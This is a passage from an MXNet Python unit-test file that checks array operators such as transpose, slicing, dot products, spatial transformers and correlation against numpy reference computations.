sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
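# test_pseudo2dtranspose builds permutations of the form axes[:n1] + axes[n2:] + axes[n1:n2],
# i.e. a cyclic move of one contiguous block of axes; judging by the name, these are the
# cases the backend can treat as a single 2-D transpose, and they are checked here for
# several integer and half-precision dtypes.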
@with_seed()
def test_pseudo2dtranspose():
    def getTwoInts(low, high):
        n1 = np.random.randint(low, high)
        n2 = np.random.randint(low, high - 1)
        n2 = n2 if n2 < n1 else n2 + 1
        return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@with_seed()
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@with_seed()
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
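# test_stn zeroes the localisation network's weights and sets its bias to
# [0.5, 0, 0, 0, 0.5, 0], i.e. the affine matrix [[0.5, 0, 0], [0, 0.5, 0]], so the
# SpatialTransformer output must equal the centre crop
# data[:, :, h//4:h-h//4, w//4:w-w//4]; the backward pass is checked the same way.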
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
            for h in [5, 9, 13, 17]:  # for convenience of the test, the third and fourth input dims should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
                        continue
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
    return mx.sym.Correlation(data1=img1, data2=img2, kernel_size=kernel_size,
                              max_displacement=max_displacement, stride1=stride1,
                              stride2=stride2, pad_size=pad_size, is_multiply=is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
                # (x1, y1) is the location in data1; (i, j) is the location in the output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
                # (x1, y1) is the location in data1; (i, j) is the location in the output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
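# Illustrative helper (added for exposition; the name `_correlation_output_shape` is local to this
# sketch and not an MXNet API): it isolates the output geometry that both reference
# implementations above recompute inline.
def _correlation_output_shape(data_shape, kernel_size, max_displacement, stride1, stride2, pad_size):
    padded_h = data_shape[2] + 2 * pad_size
    padded_w = data_shape[3] + 2 * pad_size
    # every output location needs a border of (kernel radius + max displacement) pixels
    border = max_displacement + (kernel_size - 1) // 2
    top_h = (padded_h - 2 * border) // stride1
    top_w = (padded_w - 2 * border) // stride1
    # one output channel per displacement in the (2r + 1) x (2r + 1) neighborhood grid
    grid_width = 2 * (max_displacement // stride2) + 1
    return (data_shape[0], grid_width * grid_width, top_h, top_w)
# e.g. _correlation_output_shape((1, 3, 10, 10), 1, 4, 1, 1, 4) == (1, 81, 10, 10)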
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from b is not as expected, "
                                            "Expected :%s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
        unittest_correlation((1, 3, 10, 10), kernel_size=1, max_displacement=4, stride1=1, stride2=1, pad_size=4, is_multiply=False, dtype=dtype)
        unittest_correlation((5, 1, 15, 15), kernel_size=1, max_displacement=5, stride1=1, stride2=1, pad_size=5, is_multiply=False, dtype=dtype)
        unittest_correlation((5, 1, 15, 15), kernel_size=1, max_displacement=5, stride1=1, stride2=1, pad_size=5, is_multiply=True, dtype=dtype)
        unittest_correlation((5, 1, 15, 15), kernel_size=1, max_displacement=10, stride1=1, stride2=2, pad_size=10, is_multiply=True, dtype=dtype)
        unittest_correlation((5, 1, 4, 4), kernel_size=3, max_displacement=1, stride1=1, stride2=1, pad_size=2, is_multiply=True, dtype=dtype)
        unittest_correlation((5, 1, 4, 4), kernel_size=3, max_displacement=1, stride1=2, stride2=1, pad_size=2, is_multiply=True, dtype=dtype)
        unittest_correlation((5, 1, 4, 4), kernel_size=3, max_displacement=1, stride1=2, stride2=1, pad_size=2, is_multiply=False, dtype=dtype)
        unittest_correlation((5, 1, 6, 4), kernel_size=3, max_displacement=1, stride1=2, stride2=1, pad_size=2, is_multiply=False, dtype=dtype)
        unittest_correlation((5, 1, 11, 11), kernel_size=5, max_displacement=1, stride1=1, stride2=1, pad_size=2, is_multiply=False, dtype=dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
assert_almost_equal(grad_np, grad)
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
